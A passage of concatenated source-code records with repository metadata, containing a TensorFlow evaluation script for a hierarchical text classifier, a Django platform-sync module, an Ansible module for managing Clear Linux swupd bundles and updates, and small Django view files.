dhcp_desc = self._dhcp_client.get_dhcp_desc(mac, vlan)
retry_count = retry_count + 1
return dhcp_desc
def dhcp_allocated_ip(dhcp_desc) -> bool:
return dhcp_desc is not None and dhcp_desc.ip_is_allocated()
| true | true |
1c3062d47ecc1550f5535f38c0e344d751d76367 | 8,920 | py | Python | HARNN/test_harnn.py | TownShaw/Hierarchical-Multi-Label-Text-Classification | e7d0f8d29b8c7b37b951c547b62b9655011fb0be | [
"Apache-2.0"
] | 225 | 2019-09-06T05:21:20.000Z | 2022-03-29T08:36:33.000Z | HARNN/test_harnn.py | TownShaw/Hierarchical-Multi-Label-Text-Classification | e7d0f8d29b8c7b37b951c547b62b9655011fb0be | [
"Apache-2.0"
] | 18 | 2019-12-21T14:43:32.000Z | 2021-12-16T07:13:19.000Z | HARNN/test_harnn.py | TownShaw/Hierarchical-Multi-Label-Text-Classification | e7d0f8d29b8c7b37b951c547b62b9655011fb0be | [
"Apache-2.0"
] | 53 | 2019-10-09T13:36:15.000Z | 2022-03-21T09:04:02.000Z | # -*- coding:utf-8 -*-
__author__ = 'Randolph'
import os
import sys
import time
import logging
import numpy as np
sys.path.append('../')
logging.getLogger('tensorflow').disabled = True
import tensorflow as tf
from utils import checkmate as cm
from utils import data_helpers as dh
from utils import param_parser as parser
from sklearn.metrics import precision_score, recall_score, f1_score, roc_auc_score, average_precision_score
args = parser.parameter_parser()
MODEL = dh.get_model_name()
logger = dh.logger_fn("tflog", "logs/Test-{0}.log".format(time.asctime()))
CPT_DIR = 'runs/' + MODEL + '/checkpoints/'
BEST_CPT_DIR = 'runs/' + MODEL + '/bestcheckpoints/'
SAVE_DIR = 'output/' + MODEL
def create_input_data(data: dict):
return zip(data['pad_seqs'], data['section'], data['subsection'], data['group'],
data['subgroup'], data['onehot_labels'], data['labels'])
def test_harnn():
"""Test HARNN model."""
# Print parameters used for the model
dh.tab_printer(args, logger)
# Load word2vec model
word2idx, embedding_matrix = dh.load_word2vec_matrix(args.word2vec_file)
# Load data
logger.info("Loading data...")
logger.info("Data processing...")
test_data = dh.load_data_and_labels(args, args.test_file, word2idx)
# Load harnn model
OPTION = dh._option(pattern=1)
if OPTION == 'B':
logger.info("Loading best model...")
checkpoint_file = cm.get_best_checkpoint(BEST_CPT_DIR, select_maximum_value=True)
else:
logger.info("Loading latest model...")
checkpoint_file = tf.train.latest_checkpoint(CPT_DIR)
logger.info(checkpoint_file)
graph = tf.Graph()
with graph.as_default():
session_conf = tf.ConfigProto(
allow_soft_placement=args.allow_soft_placement,
log_device_placement=args.log_device_placement)
session_conf.gpu_options.allow_growth = args.gpu_options_allow_growth
sess = tf.Session(config=session_conf)
with sess.as_default():
# Load the saved meta graph and restore variables
saver = tf.train.import_meta_graph("{0}.meta".format(checkpoint_file))
saver.restore(sess, checkpoint_file)
# Get the placeholders from the graph by name
input_x = graph.get_operation_by_name("input_x").outputs[0]
input_y_first = graph.get_operation_by_name("input_y_first").outputs[0]
input_y_second = graph.get_operation_by_name("input_y_second").outputs[0]
input_y_third = graph.get_operation_by_name("input_y_third").outputs[0]
input_y_fourth = graph.get_operation_by_name("input_y_fourth").outputs[0]
input_y = graph.get_operation_by_name("input_y").outputs[0]
dropout_keep_prob = graph.get_operation_by_name("dropout_keep_prob").outputs[0]
alpha = graph.get_operation_by_name("alpha").outputs[0]
is_training = graph.get_operation_by_name("is_training").outputs[0]
# Tensors we want to evaluate
first_scores = graph.get_operation_by_name("first-output/scores").outputs[0]
second_scores = graph.get_operation_by_name("second-output/scores").outputs[0]
third_scores = graph.get_operation_by_name("third-output/scores").outputs[0]
fourth_scores = graph.get_operation_by_name("fourth-output/scores").outputs[0]
scores = graph.get_operation_by_name("output/scores").outputs[0]
# Split the output nodes name by '|' if you have several output nodes
output_node_names = "first-output/scores|second-output/scores|third-output/scores|fourth-output/scores|output/scores"
# Save the .pb model file
output_graph_def = tf.graph_util.convert_variables_to_constants(sess, sess.graph_def,
output_node_names.split("|"))
tf.train.write_graph(output_graph_def, "graph", "graph-harnn-{0}.pb".format(MODEL), as_text=False)
# Generate batches for one epoch
batches = dh.batch_iter(list(create_input_data(test_data)), args.batch_size, 1, shuffle=False)
# Collect the predictions here
true_labels = []
predicted_labels = []
predicted_scores = []
# Collect for calculating metrics
true_onehot_labels = [[], [], [], [], []]
predicted_onehot_scores = [[], [], [], [], []]
predicted_onehot_labels = [[], [], [], [], []]
for batch_test in batches:
x, sec, subsec, group, subgroup, y_onehot, y = zip(*batch_test)
y_batch_test_list = [y_onehot, sec, subsec, group, subgroup]
feed_dict = {
input_x: x,
input_y_first: sec,
input_y_second: subsec,
input_y_third: group,
input_y_fourth: subgroup,
input_y: y_onehot,
dropout_keep_prob: 1.0,
alpha: args.alpha,
is_training: False
}
batch_global_scores, batch_first_scores, batch_second_scores, batch_third_scores, batch_fourth_scores = \
sess.run([scores, first_scores, second_scores, third_scores, fourth_scores], feed_dict)
batch_scores = [batch_global_scores, batch_first_scores, batch_second_scores,
batch_third_scores, batch_fourth_scores]
# Get the predicted labels by threshold
batch_predicted_labels_ts, batch_predicted_scores_ts = \
dh.get_label_threshold(scores=batch_scores[0], threshold=args.threshold)
# Add results to collection
for labels in y:
true_labels.append(labels)
for labels in batch_predicted_labels_ts:
predicted_labels.append(labels)
for values in batch_predicted_scores_ts:
predicted_scores.append(values)
for index in range(len(predicted_onehot_scores)):
for onehot_labels in y_batch_test_list[index]:
true_onehot_labels[index].append(onehot_labels)
for onehot_scores in batch_scores[index]:
predicted_onehot_scores[index].append(onehot_scores)
# Get one-hot prediction by threshold
predicted_onehot_labels_ts = \
dh.get_onehot_label_threshold(scores=batch_scores[index], threshold=args.threshold)
for onehot_labels in predicted_onehot_labels_ts:
predicted_onehot_labels[index].append(onehot_labels)
# Calculate Precision & Recall & F1
for index in range(len(predicted_onehot_scores)):
test_pre = precision_score(y_true=np.array(true_onehot_labels[index]),
y_pred=np.array(predicted_onehot_labels[index]), average='micro')
test_rec = recall_score(y_true=np.array(true_onehot_labels[index]),
y_pred=np.array(predicted_onehot_labels[index]), average='micro')
test_F1 = f1_score(y_true=np.array(true_onehot_labels[index]),
y_pred=np.array(predicted_onehot_labels[index]), average='micro')
test_auc = roc_auc_score(y_true=np.array(true_onehot_labels[index]),
y_score=np.array(predicted_onehot_scores[index]), average='micro')
test_prc = average_precision_score(y_true=np.array(true_onehot_labels[index]),
y_score=np.array(predicted_onehot_scores[index]), average="micro")
if index == 0:
logger.info("[Global] Predict by threshold: Precision {0:g}, Recall {1:g}, "
"F1 {2:g}, AUC {3:g}, AUPRC {4:g}"
.format(test_pre, test_rec, test_F1, test_auc, test_prc))
else:
logger.info("[Local] Predict by threshold in Level-{0}: Precision {1:g}, Recall {2:g}, "
"F1 {3:g}, AUPRC {4:g}".format(index, test_pre, test_rec, test_F1, test_prc))
# Save the prediction result
if not os.path.exists(SAVE_DIR):
os.makedirs(SAVE_DIR)
dh.create_prediction_file(output_file=SAVE_DIR + "/predictions.json", data_id=test_data['id'],
true_labels=true_labels, predict_labels=predicted_labels,
predict_scores=predicted_scores)
logger.info("All Done.")
if __name__ == '__main__':
test_harnn()
| 48.743169 | 129 | 0.610762 |
__author__ = 'Randolph'
import os
import sys
import time
import logging
import numpy as np
sys.path.append('../')
logging.getLogger('tensorflow').disabled = True
import tensorflow as tf
from utils import checkmate as cm
from utils import data_helpers as dh
from utils import param_parser as parser
from sklearn.metrics import precision_score, recall_score, f1_score, roc_auc_score, average_precision_score
args = parser.parameter_parser()
MODEL = dh.get_model_name()
logger = dh.logger_fn("tflog", "logs/Test-{0}.log".format(time.asctime()))
CPT_DIR = 'runs/' + MODEL + '/checkpoints/'
BEST_CPT_DIR = 'runs/' + MODEL + '/bestcheckpoints/'
SAVE_DIR = 'output/' + MODEL
def create_input_data(data: dict):
return zip(data['pad_seqs'], data['section'], data['subsection'], data['group'],
data['subgroup'], data['onehot_labels'], data['labels'])
def test_harnn():
dh.tab_printer(args, logger)
word2idx, embedding_matrix = dh.load_word2vec_matrix(args.word2vec_file)
logger.info("Loading data...")
logger.info("Data processing...")
test_data = dh.load_data_and_labels(args, args.test_file, word2idx)
OPTION = dh._option(pattern=1)
if OPTION == 'B':
logger.info("Loading best model...")
checkpoint_file = cm.get_best_checkpoint(BEST_CPT_DIR, select_maximum_value=True)
else:
logger.info("Loading latest model...")
checkpoint_file = tf.train.latest_checkpoint(CPT_DIR)
logger.info(checkpoint_file)
graph = tf.Graph()
with graph.as_default():
session_conf = tf.ConfigProto(
allow_soft_placement=args.allow_soft_placement,
log_device_placement=args.log_device_placement)
session_conf.gpu_options.allow_growth = args.gpu_options_allow_growth
sess = tf.Session(config=session_conf)
with sess.as_default():
saver = tf.train.import_meta_graph("{0}.meta".format(checkpoint_file))
saver.restore(sess, checkpoint_file)
input_x = graph.get_operation_by_name("input_x").outputs[0]
input_y_first = graph.get_operation_by_name("input_y_first").outputs[0]
input_y_second = graph.get_operation_by_name("input_y_second").outputs[0]
input_y_third = graph.get_operation_by_name("input_y_third").outputs[0]
input_y_fourth = graph.get_operation_by_name("input_y_fourth").outputs[0]
input_y = graph.get_operation_by_name("input_y").outputs[0]
dropout_keep_prob = graph.get_operation_by_name("dropout_keep_prob").outputs[0]
alpha = graph.get_operation_by_name("alpha").outputs[0]
is_training = graph.get_operation_by_name("is_training").outputs[0]
first_scores = graph.get_operation_by_name("first-output/scores").outputs[0]
second_scores = graph.get_operation_by_name("second-output/scores").outputs[0]
third_scores = graph.get_operation_by_name("third-output/scores").outputs[0]
fourth_scores = graph.get_operation_by_name("fourth-output/scores").outputs[0]
scores = graph.get_operation_by_name("output/scores").outputs[0]
output_node_names = "first-output/scores|second-output/scores|third-output/scores|fourth-output/scores|output/scores"
output_graph_def = tf.graph_util.convert_variables_to_constants(sess, sess.graph_def,
output_node_names.split("|"))
tf.train.write_graph(output_graph_def, "graph", "graph-harnn-{0}.pb".format(MODEL), as_text=False)
batches = dh.batch_iter(list(create_input_data(test_data)), args.batch_size, 1, shuffle=False)
true_labels = []
predicted_labels = []
predicted_scores = []
true_onehot_labels = [[], [], [], [], []]
predicted_onehot_scores = [[], [], [], [], []]
predicted_onehot_labels = [[], [], [], [], []]
for batch_test in batches:
x, sec, subsec, group, subgroup, y_onehot, y = zip(*batch_test)
y_batch_test_list = [y_onehot, sec, subsec, group, subgroup]
feed_dict = {
input_x: x,
input_y_first: sec,
input_y_second: subsec,
input_y_third: group,
input_y_fourth: subgroup,
input_y: y_onehot,
dropout_keep_prob: 1.0,
alpha: args.alpha,
is_training: False
}
batch_global_scores, batch_first_scores, batch_second_scores, batch_third_scores, batch_fourth_scores = \
sess.run([scores, first_scores, second_scores, third_scores, fourth_scores], feed_dict)
batch_scores = [batch_global_scores, batch_first_scores, batch_second_scores,
batch_third_scores, batch_fourth_scores]
batch_predicted_labels_ts, batch_predicted_scores_ts = \
dh.get_label_threshold(scores=batch_scores[0], threshold=args.threshold)
for labels in y:
true_labels.append(labels)
for labels in batch_predicted_labels_ts:
predicted_labels.append(labels)
for values in batch_predicted_scores_ts:
predicted_scores.append(values)
for index in range(len(predicted_onehot_scores)):
for onehot_labels in y_batch_test_list[index]:
true_onehot_labels[index].append(onehot_labels)
for onehot_scores in batch_scores[index]:
predicted_onehot_scores[index].append(onehot_scores)
predicted_onehot_labels_ts = \
dh.get_onehot_label_threshold(scores=batch_scores[index], threshold=args.threshold)
for onehot_labels in predicted_onehot_labels_ts:
predicted_onehot_labels[index].append(onehot_labels)
for index in range(len(predicted_onehot_scores)):
test_pre = precision_score(y_true=np.array(true_onehot_labels[index]),
y_pred=np.array(predicted_onehot_labels[index]), average='micro')
test_rec = recall_score(y_true=np.array(true_onehot_labels[index]),
y_pred=np.array(predicted_onehot_labels[index]), average='micro')
test_F1 = f1_score(y_true=np.array(true_onehot_labels[index]),
y_pred=np.array(predicted_onehot_labels[index]), average='micro')
test_auc = roc_auc_score(y_true=np.array(true_onehot_labels[index]),
y_score=np.array(predicted_onehot_scores[index]), average='micro')
test_prc = average_precision_score(y_true=np.array(true_onehot_labels[index]),
y_score=np.array(predicted_onehot_scores[index]), average="micro")
if index == 0:
logger.info("[Global] Predict by threshold: Precision {0:g}, Recall {1:g}, "
"F1 {2:g}, AUC {3:g}, AUPRC {4:g}"
.format(test_pre, test_rec, test_F1, test_auc, test_prc))
else:
logger.info("[Local] Predict by threshold in Level-{0}: Precision {1:g}, Recall {2:g}, "
"F1 {3:g}, AUPRC {4:g}".format(index, test_pre, test_rec, test_F1, test_prc))
if not os.path.exists(SAVE_DIR):
os.makedirs(SAVE_DIR)
dh.create_prediction_file(output_file=SAVE_DIR + "/predictions.json", data_id=test_data['id'],
true_labels=true_labels, predict_labels=predicted_labels,
predict_scores=predicted_scores)
logger.info("All Done.")
if __name__ == '__main__':
test_harnn()
| true | true |
1c30639ec356fd7364c53bd692139438c10f7447 | 1,322 | py | Python | apps/publications/logic/sync.py | remocrevo/celus | 682b13168eb475d7f970502113e756e40a899877 | [
"MIT"
] | null | null | null | apps/publications/logic/sync.py | remocrevo/celus | 682b13168eb475d7f970502113e756e40a899877 | [
"MIT"
] | null | null | null | apps/publications/logic/sync.py | remocrevo/celus | 682b13168eb475d7f970502113e756e40a899877 | [
"MIT"
] | null | null | null | """
Stuff related to synchronization of organization data between the local database
and an external source
"""
from core.task_support import cache_based_lock
from erms.sync import ERMSObjectSyncer
from ..models import Platform
from django.db.transaction import atomic
from django.conf import settings
from core.models import DataSource
from erms.api import ERMS
class PlatformSyncer(ERMSObjectSyncer):
attr_map = {
'id': 'ext_id',
'short name': 'short_name',
'short_name_en': 'short_name', # short name is not translatable
'short_name_cs': 'short_name',
'provider': 'provider',
'provider_en': 'provider_en',
'provider_cs': 'provider_cs',
'name': 'name',
'name_en': 'name_en',
'name_cs': 'name_cs',
'url': 'url',
}
object_class = Platform
@atomic()
def erms_sync_platforms() -> dict:
with cache_based_lock('erms_sync_platforms'):
erms = ERMS(base_url=settings.ERMS_API_URL)
erms_records = erms.fetch_objects(ERMS.CLS_PLATFORM)
data_source, _created = DataSource.objects.get_or_create(short_name='ERMS',
type=DataSource.TYPE_API)
syncer = PlatformSyncer(data_source)
return syncer.sync_data(erms_records)
| 30.045455 | 90 | 0.656581 | from core.task_support import cache_based_lock
from erms.sync import ERMSObjectSyncer
from ..models import Platform
from django.db.transaction import atomic
from django.conf import settings
from core.models import DataSource
from erms.api import ERMS
class PlatformSyncer(ERMSObjectSyncer):
attr_map = {
'id': 'ext_id',
'short name': 'short_name',
'short_name_en': 'short_name',
'short_name_cs': 'short_name',
'provider': 'provider',
'provider_en': 'provider_en',
'provider_cs': 'provider_cs',
'name': 'name',
'name_en': 'name_en',
'name_cs': 'name_cs',
'url': 'url',
}
object_class = Platform
@atomic()
def erms_sync_platforms() -> dict:
with cache_based_lock('erms_sync_platforms'):
erms = ERMS(base_url=settings.ERMS_API_URL)
erms_records = erms.fetch_objects(ERMS.CLS_PLATFORM)
data_source, _created = DataSource.objects.get_or_create(short_name='ERMS',
type=DataSource.TYPE_API)
syncer = PlatformSyncer(data_source)
return syncer.sync_data(erms_records)
| true | true |
1c3063ff282f493486da891b43dde3f1edcd3ccd | 8,726 | py | Python | exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/swupd.py | tr3ck3r/linklight | 5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7 | [
"MIT"
] | null | null | null | exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/swupd.py | tr3ck3r/linklight | 5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7 | [
"MIT"
] | null | null | null | exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/swupd.py | tr3ck3r/linklight | 5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# (c) 2017, Alberto Murillo <alberto.murillo.silva@intel.com>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: swupd
short_description: Manages updates and bundles in ClearLinux systems.
description:
- Manages updates and bundles with the swupd bundle manager, which is used by the
Clear Linux Project for Intel Architecture.
author: Alberto Murillo (@albertomurillo)
options:
contenturl:
description:
- URL pointing to the contents of available bundles.
If not specified, the contents are retrieved from clearlinux.org.
format:
description:
- The format suffix for version file downloads. For example [1,2,3,staging,etc].
If not specified, the default format is used.
manifest:
description:
- The manifest contains information about the bundles at certain version of the OS.
Specify a Manifest version to verify against that version or leave unspecified to
verify against the current version.
aliases: [release, version]
name:
description:
- Name of the (I)bundle to install or remove.
aliases: [bundle]
state:
description:
- Indicates the desired (I)bundle state. C(present) ensures the bundle
is installed while C(absent) ensures the (I)bundle is not installed.
default: present
choices: [present, absent]
update:
description:
- Updates the OS to the latest version.
type: bool
url:
description:
- Overrides both I(contenturl) and I(versionurl).
verify:
description:
- Verify content for OS version.
type: bool
versionurl:
description:
- URL for version string download.
'''
EXAMPLES = '''
- name: Update the OS to the latest version
swupd:
update: yes
- name: Installs the "foo" bundle
swupd:
name: foo
state: present
- name: Removes the "foo" bundle
swupd:
name: foo
state: absent
- name: Check integrity of filesystem
swupd:
verify: yes
- name: Downgrade OS to release 12920
swupd:
verify: yes
manifest: 12920
'''
RETURN = '''
stdout:
description: stdout of swupd
returned: always
type: str
stderr:
description: stderr of swupd
returned: always
type: str
'''
import os
from ansible.module_utils.basic import AnsibleModule
class Swupd(object):
FILES_NOT_MATCH = "files did not match"
FILES_REPLACED = "missing files were replaced"
FILES_FIXED = "files were fixed"
FILES_DELETED = "files were deleted"
def __init__(self, module):
# Fail if swupd is not found
self.module = module
self.swupd_cmd = module.get_bin_path("swupd", False)
if not self.swupd_cmd:
module.fail_json(msg="Could not find swupd.")
# Initialize parameters
for key in module.params.keys():
setattr(self, key, module.params[key])
# Initialize return values
self.changed = False
self.failed = False
self.msg = None
self.rc = None
self.stderr = ""
self.stdout = ""
def _run_cmd(self, cmd):
self.rc, self.stdout, self.stderr = self.module.run_command(cmd, check_rc=False)
def _get_cmd(self, command):
cmd = "%s %s" % (self.swupd_cmd, command)
if self.format:
cmd += " --format=%s" % self.format
if self.manifest:
cmd += " --manifest=%s" % self.manifest
if self.url:
cmd += " --url=%s" % self.url
else:
if self.contenturl and command != "check-update":
cmd += " --contenturl=%s" % self.contenturl
if self.versionurl:
cmd += " --versionurl=%s" % self.versionurl
return cmd
def _is_bundle_installed(self, bundle):
try:
os.stat("/usr/share/clear/bundles/%s" % bundle)
except OSError:
return False
return True
def _needs_update(self):
cmd = self._get_cmd("check-update")
self._run_cmd(cmd)
if self.rc == 0:
return True
if self.rc == 1:
return False
self.failed = True
self.msg = "Failed to check for updates"
def _needs_verify(self):
cmd = self._get_cmd("verify")
self._run_cmd(cmd)
if self.rc != 0:
self.failed = True
self.msg = "Failed to check for filesystem inconsistencies."
if self.FILES_NOT_MATCH in self.stdout:
return True
return False
def install_bundle(self, bundle):
"""Installs a bundle with `swupd bundle-add bundle`"""
if self.module.check_mode:
self.module.exit_json(changed=not self._is_bundle_installed(bundle))
if self._is_bundle_installed(bundle):
self.msg = "Bundle %s is already installed" % bundle
return
cmd = self._get_cmd("bundle-add %s" % bundle)
self._run_cmd(cmd)
if self.rc == 0:
self.changed = True
self.msg = "Bundle %s installed" % bundle
return
self.failed = True
self.msg = "Failed to install bundle %s" % bundle
def remove_bundle(self, bundle):
"""Removes a bundle with `swupd bundle-remove bundle`"""
if self.module.check_mode:
self.module.exit_json(changed=self._is_bundle_installed(bundle))
if not self._is_bundle_installed(bundle):
self.msg = "Bundle %s not installed"
return
cmd = self._get_cmd("bundle-remove %s" % bundle)
self._run_cmd(cmd)
if self.rc == 0:
self.changed = True
self.msg = "Bundle %s removed" % bundle
return
self.failed = True
self.msg = "Failed to remove bundle %s" % bundle
def update_os(self):
"""Updates the os with `swupd update`"""
if self.module.check_mode:
self.module.exit_json(changed=self._needs_update())
if not self._needs_update():
self.msg = "There are no updates available"
return
cmd = self._get_cmd("update")
self._run_cmd(cmd)
if self.rc == 0:
self.changed = True
self.msg = "Update successful"
return
self.failed = True
self.msg = "Failed to check for updates"
def verify_os(self):
"""Verifies filesystem against specified or current version"""
if self.module.check_mode:
self.module.exit_json(changed=self._needs_verify())
if not self._needs_verify():
self.msg = "No files where changed"
return
cmd = self._get_cmd("verify --fix")
self._run_cmd(cmd)
if self.rc == 0 and (self.FILES_REPLACED in self.stdout or self.FILES_FIXED in self.stdout or self.FILES_DELETED in self.stdout):
self.changed = True
self.msg = "Fix successful"
return
self.failed = True
self.msg = "Failed to verify the OS"
def main():
"""The main function."""
module = AnsibleModule(
argument_spec=dict(
contenturl=dict(type="str"),
format=dict(type="str"),
manifest=dict(aliases=["release", "version"], type="int"),
name=dict(aliases=["bundle"], type="str"),
state=dict(default="present", choices=["present", "absent"], type="str"),
update=dict(default=False, type="bool"),
url=dict(type="str"),
verify=dict(default=False, type="bool"),
versionurl=dict(type="str"),
),
required_one_of=[["name", "update", "verify"]],
mutually_exclusive=[["name", "update", "verify"]],
supports_check_mode=True
)
swupd = Swupd(module)
name = module.params["name"]
state = module.params["state"]
update = module.params["update"]
verify = module.params["verify"]
if update:
swupd.update_os()
elif verify:
swupd.verify_os()
elif state == "present":
swupd.install_bundle(name)
elif state == "absent":
swupd.remove_bundle(name)
else:
swupd.failed = True
if swupd.failed:
module.fail_json(msg=swupd.msg, stdout=swupd.stdout, stderr=swupd.stderr)
else:
module.exit_json(changed=swupd.changed, msg=swupd.msg, stdout=swupd.stdout, stderr=swupd.stderr)
if __name__ == '__main__':
main()
| 28.148387 | 137 | 0.605547 |
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: swupd
short_description: Manages updates and bundles in ClearLinux systems.
description:
- Manages updates and bundles with the swupd bundle manager, which is used by the
Clear Linux Project for Intel Architecture.
author: Alberto Murillo (@albertomurillo)
options:
contenturl:
description:
- URL pointing to the contents of available bundles.
If not specified, the contents are retrieved from clearlinux.org.
format:
description:
- The format suffix for version file downloads. For example [1,2,3,staging,etc].
If not specified, the default format is used.
manifest:
description:
- The manifest contains information about the bundles at certain version of the OS.
Specify a Manifest version to verify against that version or leave unspecified to
verify against the current version.
aliases: [release, version]
name:
description:
- Name of the (I)bundle to install or remove.
aliases: [bundle]
state:
description:
- Indicates the desired (I)bundle state. C(present) ensures the bundle
is installed while C(absent) ensures the (I)bundle is not installed.
default: present
choices: [present, absent]
update:
description:
- Updates the OS to the latest version.
type: bool
url:
description:
- Overrides both I(contenturl) and I(versionurl).
verify:
description:
- Verify content for OS version.
type: bool
versionurl:
description:
- URL for version string download.
'''
EXAMPLES = '''
- name: Update the OS to the latest version
swupd:
update: yes
- name: Installs the "foo" bundle
swupd:
name: foo
state: present
- name: Removes the "foo" bundle
swupd:
name: foo
state: absent
- name: Check integrity of filesystem
swupd:
verify: yes
- name: Downgrade OS to release 12920
swupd:
verify: yes
manifest: 12920
'''
RETURN = '''
stdout:
description: stdout of swupd
returned: always
type: str
stderr:
description: stderr of swupd
returned: always
type: str
'''
import os
from ansible.module_utils.basic import AnsibleModule
class Swupd(object):
FILES_NOT_MATCH = "files did not match"
FILES_REPLACED = "missing files were replaced"
FILES_FIXED = "files were fixed"
FILES_DELETED = "files were deleted"
def __init__(self, module):
self.module = module
self.swupd_cmd = module.get_bin_path("swupd", False)
if not self.swupd_cmd:
module.fail_json(msg="Could not find swupd.")
for key in module.params.keys():
setattr(self, key, module.params[key])
self.changed = False
self.failed = False
self.msg = None
self.rc = None
self.stderr = ""
self.stdout = ""
def _run_cmd(self, cmd):
self.rc, self.stdout, self.stderr = self.module.run_command(cmd, check_rc=False)
def _get_cmd(self, command):
cmd = "%s %s" % (self.swupd_cmd, command)
if self.format:
cmd += " --format=%s" % self.format
if self.manifest:
cmd += " --manifest=%s" % self.manifest
if self.url:
cmd += " --url=%s" % self.url
else:
if self.contenturl and command != "check-update":
cmd += " --contenturl=%s" % self.contenturl
if self.versionurl:
cmd += " --versionurl=%s" % self.versionurl
return cmd
def _is_bundle_installed(self, bundle):
try:
os.stat("/usr/share/clear/bundles/%s" % bundle)
except OSError:
return False
return True
def _needs_update(self):
cmd = self._get_cmd("check-update")
self._run_cmd(cmd)
if self.rc == 0:
return True
if self.rc == 1:
return False
self.failed = True
self.msg = "Failed to check for updates"
def _needs_verify(self):
cmd = self._get_cmd("verify")
self._run_cmd(cmd)
if self.rc != 0:
self.failed = True
self.msg = "Failed to check for filesystem inconsistencies."
if self.FILES_NOT_MATCH in self.stdout:
return True
return False
def install_bundle(self, bundle):
if self.module.check_mode:
self.module.exit_json(changed=not self._is_bundle_installed(bundle))
if self._is_bundle_installed(bundle):
self.msg = "Bundle %s is already installed" % bundle
return
cmd = self._get_cmd("bundle-add %s" % bundle)
self._run_cmd(cmd)
if self.rc == 0:
self.changed = True
self.msg = "Bundle %s installed" % bundle
return
self.failed = True
self.msg = "Failed to install bundle %s" % bundle
def remove_bundle(self, bundle):
if self.module.check_mode:
self.module.exit_json(changed=self._is_bundle_installed(bundle))
if not self._is_bundle_installed(bundle):
self.msg = "Bundle %s not installed"
return
cmd = self._get_cmd("bundle-remove %s" % bundle)
self._run_cmd(cmd)
if self.rc == 0:
self.changed = True
self.msg = "Bundle %s removed" % bundle
return
self.failed = True
self.msg = "Failed to remove bundle %s" % bundle
def update_os(self):
if self.module.check_mode:
self.module.exit_json(changed=self._needs_update())
if not self._needs_update():
self.msg = "There are no updates available"
return
cmd = self._get_cmd("update")
self._run_cmd(cmd)
if self.rc == 0:
self.changed = True
self.msg = "Update successful"
return
self.failed = True
self.msg = "Failed to check for updates"
def verify_os(self):
if self.module.check_mode:
self.module.exit_json(changed=self._needs_verify())
if not self._needs_verify():
self.msg = "No files where changed"
return
cmd = self._get_cmd("verify --fix")
self._run_cmd(cmd)
if self.rc == 0 and (self.FILES_REPLACED in self.stdout or self.FILES_FIXED in self.stdout or self.FILES_DELETED in self.stdout):
self.changed = True
self.msg = "Fix successful"
return
self.failed = True
self.msg = "Failed to verify the OS"
def main():
module = AnsibleModule(
argument_spec=dict(
contenturl=dict(type="str"),
format=dict(type="str"),
manifest=dict(aliases=["release", "version"], type="int"),
name=dict(aliases=["bundle"], type="str"),
state=dict(default="present", choices=["present", "absent"], type="str"),
update=dict(default=False, type="bool"),
url=dict(type="str"),
verify=dict(default=False, type="bool"),
versionurl=dict(type="str"),
),
required_one_of=[["name", "update", "verify"]],
mutually_exclusive=[["name", "update", "verify"]],
supports_check_mode=True
)
swupd = Swupd(module)
name = module.params["name"]
state = module.params["state"]
update = module.params["update"]
verify = module.params["verify"]
if update:
swupd.update_os()
elif verify:
swupd.verify_os()
elif state == "present":
swupd.install_bundle(name)
elif state == "absent":
swupd.remove_bundle(name)
else:
swupd.failed = True
if swupd.failed:
module.fail_json(msg=swupd.msg, stdout=swupd.stdout, stderr=swupd.stderr)
else:
module.exit_json(changed=swupd.changed, msg=swupd.msg, stdout=swupd.stdout, stderr=swupd.stderr)
if __name__ == '__main__':
main()
| true | true |
1c3064a56dc4cd358db290b5dbff8c3e63727911 | 359 | py | Python | {{cookiecutter.project_slug}}/apps/client/views.py | Nomadicode/django-cookie | 63bce1225d481d5cd6c6f2b1e1bbb6d47a3c5dab | [
"BSD-3-Clause"
] | 3 | 2020-10-10T20:08:08.000Z | 2021-03-26T05:46:25.000Z | {{cookiecutter.project_slug}}/apps/client/views.py | yunior22/django-cookie | a879f8f0388ad4e7bf4950f73f7423652b3d71c6 | [
"BSD-3-Clause"
] | null | null | null | {{cookiecutter.project_slug}}/apps/client/views.py | yunior22/django-cookie | a879f8f0388ad4e7bf4950f73f7423652b3d71c6 | [
"BSD-3-Clause"
] | 1 | 2021-11-19T21:25:45.000Z | 2021-11-19T21:25:45.000Z | from django.shortcuts import render
template = 'index.html'
# This method loads the main index html file
# and loads the root path.
def root_path(request):
return render(request, template)
# This method loads the main index html file
# and loads any vue routes.
def vue_router(request):
context = {}
return render(request, template, context)
| 21.117647 | 45 | 0.735376 | from django.shortcuts import render
template = 'index.html'
def root_path(request):
return render(request, template)
def vue_router(request):
context = {}
return render(request, template, context)
| true | true |
1c3064c4cf5ebab2d83d1eb92d2137f66e2a6a89 | 22 | py | Python | mlvtk/base/normalize/__init__.py | tm-schwartz/mlvtk | 58db322d763b4572f1d5c52d81ba854a317bbd8c | [
"MIT"
] | 6 | 2021-01-11T20:10:28.000Z | 2022-03-31T03:02:18.000Z | mlvtk/base/normalize/__init__.py | tm-schwartz/mlvtk | 58db322d763b4572f1d5c52d81ba854a317bbd8c | [
"MIT"
] | 1 | 2020-10-23T06:11:23.000Z | 2020-10-23T06:11:23.000Z | mlvtk/base/normalize/__init__.py | tm-schwartz/mlvtk | 58db322d763b4572f1d5c52d81ba854a317bbd8c | [
"MIT"
] | 1 | 2021-06-20T07:27:47.000Z | 2021-06-20T07:27:47.000Z | from .. import Vmodel
| 11 | 21 | 0.727273 | from .. import Vmodel
| true | true |
1c3065efe5b88fa013826b85d95896ad96c68051 | 1,193 | py | Python | reviewboard/webapi/resources/draft_patched_file.py | znick/reviewboard | f32320b267efcdf2feff1661eabe57f99ef490a7 | [
"MIT"
] | null | null | null | reviewboard/webapi/resources/draft_patched_file.py | znick/reviewboard | f32320b267efcdf2feff1661eabe57f99ef490a7 | [
"MIT"
